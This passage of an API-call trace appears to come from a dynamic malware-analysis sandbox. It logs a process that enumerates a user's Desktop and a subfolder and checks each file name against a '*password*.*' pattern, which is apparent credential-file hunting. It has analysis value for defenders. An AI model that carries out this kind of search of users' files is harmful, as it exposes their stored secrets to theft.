cFileName="LyMn8DqKE.jpg", cAlternateFileName="LYMN8D~1.JPG")) returned 1 [0110.969] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970448, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.969] PathMatchSpecW (pszFile="LyMn8DqKE.jpg", pszSpec="*password*.*") returned 0 [0110.969] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39c99910, ftCreationTime.dwHighDateTime=0x1d7af1b, ftLastAccessTime.dwLowDateTime=0x44bbdf10, ftLastAccessTime.dwHighDateTime=0x1d7af4b, ftLastWriteTime.dwLowDateTime=0x44bbdf10, ftLastWriteTime.dwHighDateTime=0x1d7af4b, nFileSizeHigh=0x0, nFileSizeLow=0x6aba, dwReserved0=0x0, dwReserved1=0x0, cFileName="MB3JQQUgbwGVRNgeCA.gif", cAlternateFileName="MB3JQQ~1.GIF")) returned 1 [0110.969] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970628, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.969] PathMatchSpecW (pszFile="MB3JQQUgbwGVRNgeCA.gif", pszSpec="*password*.*") returned 0 [0110.970] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53c41370, ftCreationTime.dwHighDateTime=0x1d7ae73, ftLastAccessTime.dwLowDateTime=0x50a541d0, ftLastAccessTime.dwHighDateTime=0x1d7af24, ftLastWriteTime.dwLowDateTime=0x50a541d0, ftLastWriteTime.dwHighDateTime=0x1d7af24, nFileSizeHigh=0x0, nFileSizeLow=0x17a6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="O93_HCF.xlsx", cAlternateFileName="O93_HC~1.XLS")) returned 1 [0110.970] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970588, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.970] PathMatchSpecW (pszFile="O93_HCF.xlsx", pszSpec="*password*.*") returned 0 [0110.970] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212b71d0, ftCreationTime.dwHighDateTime=0x1d7a377, ftLastAccessTime.dwLowDateTime=0xbbf74c40, ftLastAccessTime.dwHighDateTime=0x1d7ac26, ftLastWriteTime.dwLowDateTime=0xbbf74c40, ftLastWriteTime.dwHighDateTime=0x1d7ac26, nFileSizeHigh=0x0, nFileSizeLow=0x4735, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oar504.gif", cAlternateFileName="")) returned 1 [0110.970] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39703d0, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.970] PathMatchSpecW (pszFile="Oar504.gif", pszSpec="*password*.*") returned 0 [0110.970] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="p B1LdDcHaeS", cAlternateFileName="PB1LDD~1")) returned 1 [0110.970] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.970] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743960 [0110.970] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.970] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.970] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.970] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c5cc6e0, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x5ed18130, ftLastAccessTime.dwHighDateTime=0x1d7a4a0, ftLastWriteTime.dwLowDateTime=0x5ed18130, ftLastWriteTime.dwHighDateTime=0x1d7a4a0, nFileSizeHigh=0x0, nFileSizeLow=0x34c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="6eLLiqLz9t.avi", cAlternateFileName="6ELLIQ~1.AVI")) returned 1 [0110.970] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x3970560, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.971] PathMatchSpecW (pszFile="6eLLiqLz9t.avi", pszSpec="*password*.*") returned 0 [0110.971] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe18e7860, ftCreationTime.dwHighDateTime=0x1d7a074, ftLastAccessTime.dwLowDateTime=0x48a8aa90, ftLastAccessTime.dwHighDateTime=0x1d7ab22, ftLastWriteTime.dwLowDateTime=0x48a8aa90, ftLastWriteTime.dwHighDateTime=0x1d7ab22, nFileSizeHigh=0x0, nFileSizeLow=0xdfb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="D9uCaq_HSLxl.pdf", cAlternateFileName="D9UCAQ~1.PDF")) returned 1 [0110.971] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x39705d8, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.971] PathMatchSpecW (pszFile="D9uCaq_HSLxl.pdf", pszSpec="*password*.*") returned 0 [0110.971] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8974c4f0, ftCreationTime.dwHighDateTime=0x1d7af73, ftLastAccessTime.dwLowDateTime=0x4d8c28d0, ftLastAccessTime.dwHighDateTime=0x1d7b012, ftLastWriteTime.dwLowDateTime=0x4d8c28d0, ftLastWriteTime.dwHighDateTime=0x1d7b012, nFileSizeHigh=0x0, nFileSizeLow=0x7537, dwReserved0=0x0, dwReserved1=0x0, cFileName="E144W5Mz.swf", cAlternateFileName="")) returned 1 [0110.971] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x3970560, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.971] PathMatchSpecW (pszFile="E144W5Mz.swf", pszSpec="*password*.*") returned 0 [0110.971] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd254fcd0, ftCreationTime.dwHighDateTime=0x1d7a618, ftLastAccessTime.dwLowDateTime=0x8a464820, ftLastAccessTime.dwHighDateTime=0x1d7aac5, ftLastWriteTime.dwLowDateTime=0x8a464820, ftLastWriteTime.dwHighDateTime=0x1d7aac5, nFileSizeHigh=0x0, nFileSizeLow=0xbc6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lDOubGqNdXLFW1EA.wav", cAlternateFileName="LDOUBG~1.WAV")) returned 1 [0110.971] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x3970588, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.971] PathMatchSpecW (pszFile="lDOubGqNdXLFW1EA.wav", pszSpec="*password*.*") returned 0 [0110.971] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4da7350, ftCreationTime.dwHighDateTime=0x1d79ff8, ftLastAccessTime.dwLowDateTime=0x83641e80, ftLastAccessTime.dwHighDateTime=0x1d7ac8a, ftLastWriteTime.dwLowDateTime=0x83641e80, ftLastWriteTime.dwHighDateTime=0x1d7ac8a, nFileSizeHigh=0x0, nFileSizeLow=0x10bdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFSiahfxrlNjf.swf", cAlternateFileName="OFSIAH~1.SWF")) returned 1 [0110.971] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x3970470, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.972] PathMatchSpecW (pszFile="OFSiahfxrlNjf.swf", pszSpec="*password*.*") returned 0 [0110.972] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52198c70, ftCreationTime.dwHighDateTime=0x1d7a68b, ftLastAccessTime.dwLowDateTime=0xa83a5210, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0xa83a5210, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x10237, dwReserved0=0x0, dwReserved1=0x0, cFileName="ws8IgIZUQH.mkv", cAlternateFileName="WS8IGI~1.MKV")) returned 1 [0110.972] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x3970470, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.972] PathMatchSpecW (pszFile="ws8IgIZUQH.mkv", pszSpec="*password*.*") returned 0 [0110.972] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 1 [0110.972] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x39706a0, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.972] PathMatchSpecW (pszFile="Y_Iia0ILxn.gif", pszSpec="*password*.*") returned 0 [0110.972] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 0 [0110.972] FindClose (in: hFindFile=0x743960 | out: hFindFile=0x743960) returned 1 [0110.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970560, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.972] PathMatchSpecW (pszFile="p B1LdDcHaeS", pszSpec="*password*.*") returned 0 [0110.972] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c892e0, ftCreationTime.dwHighDateTime=0x1d7a502, ftLastAccessTime.dwLowDateTime=0x959e5ed0, ftLastAccessTime.dwHighDateTime=0x1d7a5a5, ftLastWriteTime.dwLowDateTime=0x959e5ed0, ftLastWriteTime.dwHighDateTime=0x1d7a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x12c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKW-syaNOG91rV.gif", cAlternateFileName="PKW-SY~1.GIF")) returned 1 [0110.972] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970678, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.972] PathMatchSpecW (pszFile="PKW-syaNOG91rV.gif", pszSpec="*password*.*") returned 0 [0110.973] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0cbd0, ftCreationTime.dwHighDateTime=0x1d7a4cc, ftLastAccessTime.dwLowDateTime=0x9ce51cb0, ftLastAccessTime.dwHighDateTime=0x1d7a54b, ftLastWriteTime.dwLowDateTime=0x9ce51cb0, ftLastWriteTime.dwHighDateTime=0x1d7a54b, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="QjzdslaoFnrvJ.flv", cAlternateFileName="QJZDSL~1.FLV")) returned 1 [0110.973] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39705d8, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.973] PathMatchSpecW (pszFile="QjzdslaoFnrvJ.flv", pszSpec="*password*.*") returned 0 [0110.973] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d327160, ftCreationTime.dwHighDateTime=0x1d7aa85, ftLastAccessTime.dwLowDateTime=0x45629f70, ftLastAccessTime.dwHighDateTime=0x1d7ac63, ftLastWriteTime.dwLowDateTime=0x45629f70, ftLastWriteTime.dwHighDateTime=0x1d7ac63, nFileSizeHigh=0x0, nFileSizeLow=0x11a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QqfcEGsF2dGoVC.mp4", cAlternateFileName="QQFCEG~1.MP4")) returned 1 [0110.973] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39706c8, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.973] PathMatchSpecW (pszFile="QqfcEGsF2dGoVC.mp4", pszSpec="*password*.*") returned 0 [0110.973] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bf0caa0, ftCreationTime.dwHighDateTime=0x1d7af0e, ftLastAccessTime.dwLowDateTime=0xada19040, ftLastAccessTime.dwHighDateTime=0x1d7af75, ftLastWriteTime.dwLowDateTime=0xada19040, ftLastWriteTime.dwHighDateTime=0x1d7af75, nFileSizeHigh=0x0, nFileSizeLow=0x1311b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSkrbDuTIF.m4a", cAlternateFileName="SSKRBD~1.M4A")) returned 1 [0110.973] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39704c0, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.973] PathMatchSpecW (pszFile="SSkrbDuTIF.m4a", pszSpec="*password*.*") returned 0 [0110.973] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285d0430, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0xcfb35a10, ftLastAccessTime.dwHighDateTime=0x1d7ad22, ftLastWriteTime.dwLowDateTime=0xcfb35a10, ftLastWriteTime.dwHighDateTime=0x1d7ad22, nFileSizeHigh=0x0, nFileSizeLow=0xc05d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StgqeHlfrw0.m4a", cAlternateFileName="STGQEH~1.M4A")) returned 1 [0110.973] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39705b0, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.973] PathMatchSpecW (pszFile="StgqeHlfrw0.m4a", pszSpec="*password*.*") returned 0 [0110.973] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cc60f70, ftCreationTime.dwHighDateTime=0x1d7a02f, ftLastAccessTime.dwLowDateTime=0xa9de71c0, ftLastAccessTime.dwHighDateTime=0x1d7a585, ftLastWriteTime.dwLowDateTime=0xa9de71c0, ftLastWriteTime.dwHighDateTime=0x1d7a585, nFileSizeHigh=0x0, nFileSizeLow=0x1280, dwReserved0=0x0, dwReserved1=0x0, cFileName="SWeD.odt", cAlternateFileName="")) returned 1 [0110.974] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39703f8, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.974] PathMatchSpecW (pszFile="SWeD.odt", pszSpec="*password*.*") returned 0 [0110.974] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a932a00, ftCreationTime.dwHighDateTime=0x1d7a7f6, ftLastAccessTime.dwLowDateTime=0x6167a550, ftLastAccessTime.dwHighDateTime=0x1d7ae78, ftLastWriteTime.dwLowDateTime=0x6167a550, ftLastWriteTime.dwHighDateTime=0x1d7ae78, nFileSizeHigh=0x0, nFileSizeLow=0x9172, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQk58h 9TQk7yvi7D.mkv", cAlternateFileName="UQK58H~1.MKV")) returned 1 [0110.974] lstrcpyW (in: lpString1=0x19ce30, 